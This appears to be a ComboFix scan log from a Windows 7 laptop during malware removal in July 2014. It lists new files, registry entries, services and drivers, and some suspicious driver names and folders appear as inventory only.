@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
Completion time: 2014-07-17  09:02:29
ComboFix-quarantined-files.txt  2014-07-17 13:02
ComboFix2.txt  2014-07-17 02:08
.
Pre-Run: 288,661,917,696 bytes free
Post-Run: 288,173,723,648 bytes free
.
- - End Of File - - F15E449369C4A18FF9B3694FEA5F2636
A36C5E4F47E84449FF07ED3517B43A31
 

 

 

COMBOFIX  222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222

ComboFix 14-07-16.02 - Ric 07/17/2014   9:39.3.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.6620 [GMT -4:00]
Running from: c:\users\Ric\Desktop\ComboFix.exe
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((   Files Created from 2014-06-17 to 2014-07-17  )))))))))))))))))))))))))))))))
.
.
2014-07-17 13:56 . 2014-07-17 13:56 -------- d-----w- c:\users\TEMP.Dell-XPS-1645\AppData\Local\temp
2014-07-17 13:56 . 2014-07-17 13:56 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-16 14:48 . 2014-07-17 12:41 -------- d-----w- C:\FRST
2014-07-14 16:08 . 2014-07-14 17:27 -------- d-----w- c:\windows\SysWow64\wbem\Performance
2014-07-14 15:20 . 2014-07-14 15:20 -------- d-----w- C:\RegBackup
2014-07-14 13:20 . 2014-07-14 13:20 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-07-11 19:19 . 2014-07-11 19:19 -------- d-----w- c:\windows\ERUNT
2014-07-11 18:58 . 2014-07-12 17:01 -------- d-----w- C:\Kits
2014-07-06 18:20 . 2010-08-30 12:34 536576 ----a-w- c:\windows\SysWow64\sqlite3.dll
2014-07-06 18:17 . 2014-07-13 18:11 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15 . 2014-07-06 18:15 -------- d-----w- c:\users\Ric\AppData\Local\GHISLER
2014-07-06 15:47 . 2014-07-14 15:00 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\programdata\Malwarebytes
2014-07-06 15:46 . 2014-05-12 11:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-07-06 15:46 . 2014-05-12 11:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-07-06 15:46 . 2014-05-12 11:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-07-05 18:22 . 2014-07-09 19:33 -------- d-----w- c:\users\roy
2014-07-05 16:52 . 2014-07-13 17:30 -------- d-----w- C:\Roy
2014-06-25 23:54 . 2014-06-26 00:02 -------- d-----w- c:\users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50 . 2014-07-06 17:39 -------- d-----w- c:\programdata\IculOnse
2014-06-18 13:49 . 2014-06-18 13:49 -------- d-----w- c:\programdata\Package Cache
2014-06-18 13:48 . 2014-06-18 13:48 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47 . 2014-06-18 13:47 -------- d-----w- C:\AMD
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-16 23:35 . 2012-03-31 15:56 699056 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-16 23:35 . 2011-05-18 19:14 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-11 11:40 . 2011-02-26 01:47 95414520 ----a-w- c:\windows\system32\MRT.exe
2014-06-03 20:51 . 2011-02-26 06:12 18960 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
2014-05-30 10:21 . 2014-06-11 11:33 23414784 ----a-w- c:\windows\system32\mshtml.dll
2014-05-30 10:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-05-30 10:02 . 2014-06-11 11:33 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-05-30 09:45 . 2014-06-11 11:33 2768384 ----a-w- c:\windows\system32\iertutil.dll
2014-05-30 09:39 . 2014-06-11 11:33 548352 ----a-w- c:\windows\system32\vbscript.dll
2014-05-30 09:39 . 2014-06-11 11:33 66048 ----a-w- c:\windows\system32\iesetup.dll
2014-05-30 09:38 . 2014-06-11 11:33 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-05-30 09:28 . 2014-06-11 11:33 51200 ----a-w- c:\windows\system32\jsproxy.dll
2014-05-30 09:27 . 2014-06-11 11:33 33792 ----a-w- c:\windows\system32\iernonce.dll
2014-05-30 09:24 . 2014-06-11 11:33 574976 ----a-w- c:\windows\system32\ieui.dll
2014-05-30 09:21 . 2014-06-11 11:33 139264 ----a-w- c:\windows\system32\ieUnatt.exe
2014-05-30 09:21 . 2014-06-11 11:33 111616 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-05-30 09:20 . 2014-06-11 11:33 752640 ----a-w- c:\windows\system32\jscript9diag.dll
2014-05-30 09:11 . 2014-06-11 11:33 940032 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-05-30 09:08 . 2014-06-11 11:33 5782528 ----a-w- c:\windows\system32\jscript9.dll
2014-05-30 09:06 . 2014-06-11 11:33 452096 ----a-w- c:\windows\system32\dxtmsft.dll
2014-05-30 09:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55 . 2014-06-11 11:33 38400 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-05-30 08:49 . 2014-06-11 11:33 195584 ----a-w- c:\windows\system32\msrating.dll
2014-05-30 08:46 . 2014-06-11 11:33 85504 ----a-w- c:\windows\system32\mshtmled.dll
2014-05-30 08:44 . 2014-06-11 11:33 455168 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-05-30 08:44 . 2014-06-11 11:33 295424 ----a-w- c:\windows\system32\dxtrans.dll
2014-05-30 08:43 . 2014-06-11 11:33 61952 ----a-w- c:\windows\SysWow64\iesetup.dll
2014-05-30 08:42 . 2014-06-11 11:33 51200 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:35 . 2014-06-11 11:33 608768 ----a-w- c:\windows\system32\ie4uinit.exe
2014-05-30 08:29 . 2014-06-11 11:33 631808 ----a-w- c:\windows\system32\msfeeds.dll
2014-05-30 08:28 . 2014-06-11 11:33 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27 . 2014-06-11 11:33 592896 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24 . 2014-06-11 11:33 1249280 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-05-30 08:23 . 2014-06-11 11:33 2040832 ----a-w- c:\windows\system32\inetcpl.cpl
2014-05-30 08:10 . 2014-06-11 11:33 32256 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56 . 2014-06-11 11:33 2266112 ----a-w- c:\windows\system32\wininet.dll
2014-05-30 07:56 . 2014-06-11 11:33 4244992 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-05-30 07:50 . 2014-06-11 11:33 1068032 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49 . 2014-06-11 11:33 1964544 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:43 . 2014-06-11 11:33 13522944 ----a-w- c:\windows\system32\ieframe.dll
2014-05-30 07:30 . 2014-06-11 11:33 1398272 ----a-w- c:\windows\system32\urlmon.dll
2014-05-30 07:21 . 2014-06-11 11:33 1790976 ----a-w- c:\windows\SysWow64\wininet.dll
2014-05-30 07:13 . 2014-06-11 11:33 846336 ----a-w- c:\windows\system32\ieapfltr.dll
2014-05-09 06:14 . 2014-05-14 13:38 477184 ----a-w- c:\windows\system32\aepdu.dll
2014-05-09 06:11 . 2014-05-14 13:38 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-05-08 09:32 . 2014-06-11 11:32 3178496 ----a-w- c:\windows\system32\rdpcorets.dll
2014-05-08 09:32 . 2014-06-11 11:32 16384 ----a-w- c:\windows\system32\RdpGroupPolicyExtension.dll
2014-04-25 02:34 . 2014-06-11 11:32 801280 ----a-w- c:\windows\system32\usp10.dll
2014-04-25 02:06 . 2014-06-11 11:32 626688 ----a-w- c:\windows\SysWow64\usp10.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"{90140000-003D-0000-1000-0000000FF1CE}"="del" [X]
.
c:\users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-19 33322312]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R0 xnvdb;xnvdb;c:\windows\System32\drivers\cixf.sys;c:\windows\SYSNATIVE\drivers\cixf.sys [x]
R1 qnmokglx;qnmokglx;c:\windows\system32\drivers\qnmokglx.sys;c:\windows\SYSNATIVE\drivers\qnmokglx.sys [x]
R1 smvowoli;smvowoli;c:\windows\system32\drivers\smvowoli.sys;c:\windows\SYSNATIVE\drivers\smvowoli.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [x]
R2 WMCoreService;Mobile Broadband Service;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [x]
R3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
R3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys;c:\windows\SYSNATIVE\drivers\btusbflt.sys [x]
R3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys;c:\windows\SYSNATIVE\DRIVERS\btwampfl.sys [x]
R3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
R3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;c:\windows\system32\drivers\BVRPMPR5a64.SYS;c:\windows\SYSNATIVE\drivers\BVRPMPR5a64.SYS [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 qrkis;Tether Miniport;c:\windows\system32\DRIVERS\qrkis.sys;c:\windows\SYSNATIVE\DRIVERS\qrkis.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB13;RoxMediaDB13;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [x]
R3 SwitchBoard;Adobe SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TurboBoost;TurboBoost;c:\program files\Intel\TurboBoost\TurboBoost.exe;c:\program files\Intel\TurboBoost\TurboBoost.exe [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 Sahdad64;HDD Filter Driver;c:\windows\System32\Drivers\Sahdad64.sys;c:\windows\SYSNATIVE\Drivers\Sahdad64.sys [x]
S0 Saibad64;Volume Filter Driver;c:\windows\System32\Drivers\Saibad64.sys;c:\windows\SYSNATIVE\Drivers\Saibad64.sys [x]
S1 SaibVdAd64;Virtual Disk Driver;c:\windows\system32\Drivers\SaibVdAd64.sys;c:\windows\SYSNATIVE\Drivers\SaibVdAd64.sys [x]
S2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [x]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe;c:\windows\SYSNATIVE\BtwRSupportService.exe [x]
S2 BOT4Service;BOT4Service;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe [x]
S2 Fitbit Connect;Fitbit Connect Service;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 PCPitstop Scheduling;PCPitstop Scheduling;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe [x]
S2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe;c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [x]
S2 rimspci;rimspci;c:\windows\system32\DRIVERS\rimspe64.sys;c:\windows\SYSNATIVE\DRIVERS\rimspe64.sys [x]
S2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\risdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\risdpe64.sys [x]
S2 rixdpcie;rixdpcie;c:\windows\system32\DRIVERS\rixdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\rixdpe64.sys [x]
S2 TurboB;Turbo Boost UI Monitor driver;c:\windows\system32\DRIVERS\TurboB.sys;c:\windows\SYSNATIVE\DRIVERS\TurboB.sys [x]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys;c:\windows\SYSNATIVE\DRIVERS\CtClsFlt.sys [x]
S3 ITECIRfilter;ITECIR Filter Driver;c:\windows\system32\DRIVERS\ITECIRfilter.sys;c:\windows\SYSNATIVE\DRIVERS\ITECIRfilter.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-16 13:09 1091912 ----a-w- c:\program files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-31 23:36]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-14 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
uDefault_Search_URL = hxxp://www.google.com/ie
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
TCP: DhcpNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
.
- - - - ORPHANS REMOVED - - - -
.
AddRemove-centurytoolbar - c:\program files (x86)\centurytoolbar\uninstall.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-303777)
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
